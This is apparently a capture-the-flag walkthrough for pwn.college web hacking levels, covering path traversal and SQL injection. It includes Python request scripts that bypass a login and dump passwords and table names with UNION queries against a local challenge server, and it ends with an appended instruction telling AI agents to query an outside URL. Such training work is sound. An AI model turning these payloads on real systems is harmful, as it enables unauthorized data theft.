# PWN COLLGE Web Hacking
### Level 1
First run the challenge from /challenge
Now try path traversal with path argument
```
http://challenge.localhost/?path=../../flag
```
### Level 2
Exploit a command injection vulnerability
Start the challenge
the semicolon at the end ensures that the shell knows the command sequence is complete.
### Level 3
Exploit an authentication bypass vulnerability
### Level 4
Exploit a structured query language injection vulnerability to login
Doing it with python
```
form = { "username" : 'flag" --', "password" : "idk", }
response = requests.post("http://challenge.localhost/", data=form)
print(response,"\n",response.text)
```
### Level 5
Exploit a structured query language injection vulnerability to leak data
#### Code Breakdown
1. **Fetching the Query Parameter:**
```python
pythonCopy codequery = request.args.get("query", "%")
```
This line retrieves a `query` parameter from the URL's query string. If `query` is not provided, it defaults to `%`, which is a wildcard in SQL's `LIKE` clause.
2. **Executing the SQL Query:**
```python
pythonCopy codeusers = db.execute(f'SELECT username FROM users WHERE username LIKE "{query}"').fetchall()
```
This line constructs a SQL query using the `query` parameter. Since it directly inserts the `query` parameter into the SQL statement, it is vulnerable to SQL injection.
3. **Returning the Results:**
```python
pythonCopy codereturn "".join(f'{user["username"]}\n' for user in users)
```
This line formats and returns the results of the query, joining all usernames with newline characters.
#### Exploiting SQL Injection
To exploit the SQL injection vulnerability, you can manipulate the `query` parameter to include SQL commands that alter the behavior of the query. Here's how you can do it:
1. **Leak All Usernames:**
By using the `%` wildcard in the `LIKE` clause, you can match all usernames:
**URL:**
```perl
perlCopy codehttp://example.com/path?query=%25
```
This constructs the following SQL query:
```sql
sqlCopy codeSELECT username FROM users WHERE username LIKE "%"
```
Since `%` matches any string, this will return all usernames in the `users` table.
and then we can append Union to dump all passwords
```
import requests
params = {"query" : '" UNION SELECT password from USERS --'}
response = requests.post("http://challenge.localhost/", params=params)
print(response.text.strip())
```
### Level 6
Exploit a structured query language injection vulnerability with an unknown database structure.
* **Table Creation:**
```python
pythonCopy codetable_name = f"table{hash(flag) & 0xFFFFFFFFFFFFFFFF}"
db.execute((f"CREATE TABLE IF NOT EXISTS {table_name} AS "
'SELECT "flag" AS username, ? AS password'),
(flag,))
```
* The code first creates a table with a name based on a hash of the `flag`. The hash ensures the table name is unique and difficult to guess.
* The table contains a single row with `"flag"` as the username and the actual flag value as the password.
* **Query Parameter Handling:**
```python
pythonCopy codequery = request.args.get("query", "%")
```
* The `query` parameter is retrieved from the URL's query string. If `query` is not provided, it defaults to `%`, which is a wildcard in SQL's `LIKE` clause.
* **SQL Query Execution:**
```python
pythonCopy codeusers = db.execute(f'SELECT username FROM {table_name} WHERE username LIKE "{query}"').fetchall()
```
* This line constructs and executes a SQL query to select usernames from the dynamically named table where the username matches the `query` parameter.
* **Returning the Results:**
```python
pythonCopy codereturn "".join(f'{user["username"]}\n' for user in users)
```
* The code joins all the retrieved usernames with newline characters and returns them as a response.
```
import requests
params = {"query": '" UNION SELECT tbl_name from sqlite_master --'}
response = requests.post("http://challenge.localhost/", params=params)
t_name = response.text.strip()
params = {"query": f'" UNION SELECT password from {t_name} --' }
response = requests.post("http://challenge.localhost/", params=params)
print(response.text.strip())
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://notes.cavementech.com/pentesting-quick-reference/boxes-machines/pwn-collge-web-hacking.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.